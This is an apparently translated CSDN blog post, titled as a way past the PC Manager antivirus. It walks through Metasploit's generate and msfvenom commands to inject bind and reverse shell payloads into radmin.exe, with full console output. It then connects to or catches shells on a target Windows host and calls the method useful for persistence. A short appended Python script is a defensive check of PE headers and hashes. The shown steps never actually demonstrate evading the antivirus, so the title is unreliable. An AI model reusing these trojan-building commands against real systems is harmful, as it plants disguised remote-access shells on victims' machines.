A note on getting a payload past PC Manager (電腦管家) antivirus
I. Generating with the generate command at the msf prompt
1. First, use the show payloads command to list every available payload, then select one with the use command.
msf5 > show payloads
Payloads
========
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 aix/ppc/shell_bind_tcp manual No AIX Command Shell, Bind TCP Inline
1 aix/ppc/shell_find_port manual No AIX Command Shell, Find Port Inline
2 aix/ppc/shell_interact manual No AIX execve Shell for inetd
3 aix/ppc/shell_reverse_tcp manual No AIX Command Shell, Reverse TCP Inline
...
...
559 windows/x64/vncinject/reverse_tcp_uuid manual No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
560 windows/x64/vncinject/reverse_winhttp manual No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
561 windows/x64/vncinject/reverse_winhttps manual No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
2. Use generate -h to view the command's help text
msf5 payload(windows/shell_bind_tcp) > generate -h
Usage: generate [options]
Generates a payload. Datastore options may be supplied after normal options.
Example: generate -f python LHOST=127.0.0.1
OPTIONS:
-E Force encoding
-O <opt> Deprecated: alias for the '-o' option
-P <opt> Total desired payload size, auto-produce appropriate NOP sled length
-S <opt> The new section name to use when generating (large) Windows binaries
-b <opt> The list of characters to avoid example: '\x00\xff'
-e <opt> The encoder to use
-f <opt> Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
-h Show this message
-i <opt> The number of times to encode the payload
-k Preserve the template behavior and inject the payload as a new thread
-n <opt> Prepend a nopsled of [length] size on to the payload
-o <opt> The output file name (otherwise stdout)
-p <opt> The platform of the payload
-v Verbose output (display stage in addition to stager)
-x <opt> Specify a custom executable file to use as a template
Explanation of the commonly used generate options:
-b remove bad characters, e.g. -b '\x00\xff'
-e set the encoder; use the show encoders command to list every available encoder
-f output format; defaults to Ruby if not set, e.g. -f c or -f exe
-i number of encoding passes, usually used for multi-pass encoding to evade antivirus
-k preserve the behaviour of the template and inject the payload into the process as a new thread; usually used together with -x
-o output file name
-x use the given file as the template
3. Generate the windows/shell_bind_tcp payload with generate and inject it into the radmin program
msf5 payload(windows/shell_bind_tcp) > generate -k -x /usr/share/windows-binaries/radmin.exe -f exe -o rradin.exe
[*] Writing 1319424 bytes to rradin.exe...
4. After the payload is generated and rradmin.exe is launched on the target machine, the specified port 4444 is opened; connect remotely with nc as shown below
luredeMacBook-Pro:~ lure$ nc 10.10.10.166 4444
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\lovely\Desktop>whoami
whoami
lovely-pc\lovely
C:\Users\lovely\Desktop>
5. Pitfall to note. The msf payloads include both windows/shell/bind_tcp and windows/shell_bind_tcp, written by two different authors. In testing, when nc is used to connect to a payload generated from windows/shell/bind_tcp, there is a bug where the connection succeeds but no data is returned.
II. Generating with the msfvenom command on Kali
1. Use the --list payloads option to view all payloads
root@kali2020:~# msfvenom --list payloads
Framework Payloads (562 total) [--payload <value>]
==================================================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
......
2. Use --list-options to view the available parameters
root@kali2020:~# msfvenom -p windows/shell_reverse_tcp --list-options
Options for payload/windows/shell_reverse_tcp:
=========================
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/shell_reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 324
Rank: Normal
Provided by:
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
3. Generate the payload with msfvenom and inject it into the radmin program
root@kali2020:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 1319424 bytes
Saved as: r2admin.exe
4. Run r2admin on the target machine and catch the reverse shell with msfconsole on the attacking machine
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.136
lhost => 10.10.10.136
msf5 exploit(multi/handler) > set lport 9876
lport => 9876
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.10.136:9876
[*] Command shell session 1 opened (10.10.10.136:9876 -> 10.10.10.166:50097) at 2020-07-15 23:45:36 -0400
pwd
pwd
'pwd' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
C:\Users\lovely\Desktop>whoami
whoami
lovely-pc\lovely
III. Summary
The generate command inside msfconsole and the msfvenom command are really the same command in different environments, and their functionality is essentially identical. The key point to learn here is using the -k -x options to inject a payload into an executable exe file; this technique is frequently used for persistence in the post-exploitation phase of real-world penetration tests.
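As a defender-side counterpart to the -k -x template injection summarised above, here is an added example (my code, not from the original post or the Metasploit project) that reads a PE file's section table and entry point and reports the header traits an analyst would want to review before trusting a binary that is supposed to be a plain vendor build, together with a hash comparison against a vendor-published value. The structure offsets and section flag constants come from the PE/COFF specification; the two sample images are header-only layouts constructed inline for the demonstration, and the ".extra" section name and the "trusted" hash are assumptions, not values taken from any real file.

```python
# Added example (not from the original post): a defender-side PE header check.
import hashlib
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = "<8sIIIIIIHHI"  # 40-byte IMAGE_SECTION_HEADER


def parse_pe_headers(data):
    """Return (entry_point_rva, sections) read from the PE headers of `data`.

    Only the DOS header pointer, the COFF header and the section table are
    read, so this works on a full executable or on the header-only samples
    constructed below.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    size_of_optional = struct.unpack_from("<H", data, pe_off + 20)[0]
    # AddressOfEntryPoint is at offset 16 of the optional header (PE32 and PE32+).
    entry_rva = struct.unpack_from("<I", data, pe_off + 24 + 16)[0]
    table = pe_off + 24 + size_of_optional
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, _raw_size, _raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HEADER, data, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr,
            "vsize": vsize,
            "characteristics": chars,
        })
    return entry_rva, sections


def review_hints(data):
    """Header traits worth a second look on a binary that should be an
    untouched vendor build. Returns a list of strings; empty means nothing stood out."""
    entry_rva, sections = parse_pe_headers(data)
    hints = []
    executable = [s for s in sections if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE]
    for s in sections:
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            hints.append(f"section {s['name']} is both writable and executable")
    holder = next((s for s in sections
                   if s["vaddr"] <= entry_rva < s["vaddr"] + s["vsize"]), None)
    if holder is None:
        hints.append("entry point does not fall inside any section")
    elif executable and holder is not executable[0]:
        hints.append(f"entry point is in {holder['name']}, not in the first "
                     f"executable section {executable[0]['name']}")
    if len(executable) > 1:
        hints.append("more than one executable section: "
                     + ", ".join(s["name"] for s in executable))
    return hints


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def matches_trusted_hash(data, expected_sha256_hex):
    """The simplest check of all: does the file still hash to the value the
    vendor published? Any injected payload changes the digest."""
    return sha256_hex(data) == expected_sha256_hex.lower()


def build_header_only_pe(sections, entry_rva):
    """Construct a header-only PE32 image for testing (constructed sample, no real code)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)            # e_lfanew: PE signature at offset 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    optional = bytearray(224)                        # PE32 optional header size
    struct.pack_into("<H", optional, 0, 0x10B)       # Magic: PE32
    struct.pack_into("<I", optional, 16, entry_rva)  # AddressOfEntryPoint
    table = b"".join(
        struct.pack(SECTION_HEADER, name.ljust(8, b"\0"), vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional) + table


# Constructed samples: a plausible clean layout, and the same layout with an
# added RWX section (assumed name ".extra") that now owns the entry point.
CLEAN_LAYOUT = [
    (b".text", 0x1000, 0x5000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".rdata", 0x6000, 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".data", 0x7000, 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
]
CLEAN_SAMPLE = build_header_only_pe(CLEAN_LAYOUT, 0x1200)
SUSPECT_SAMPLE = build_header_only_pe(
    CLEAN_LAYOUT + [(b".extra", 0x8000, 0x2000,
                     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
    0x8010)

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("suspect", SUSPECT_SAMPLE)):
        print(label, review_hints(sample) or ["nothing stood out"])
```

The hints are review prompts, not verdicts: legitimate packers and some compilers also produce several executable sections, so a hit means "compare against the vendor's copy", which is why the hash comparison sits beside the header heuristics.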
————————————————
Copyright notice: this article is an original work by CSDN blogger "redwand", published under the CC 4.0 BY-SA licence; please include the original source link and this notice when reposting.
Original link: https://blog.csdn.net/redwand/article/details/107503304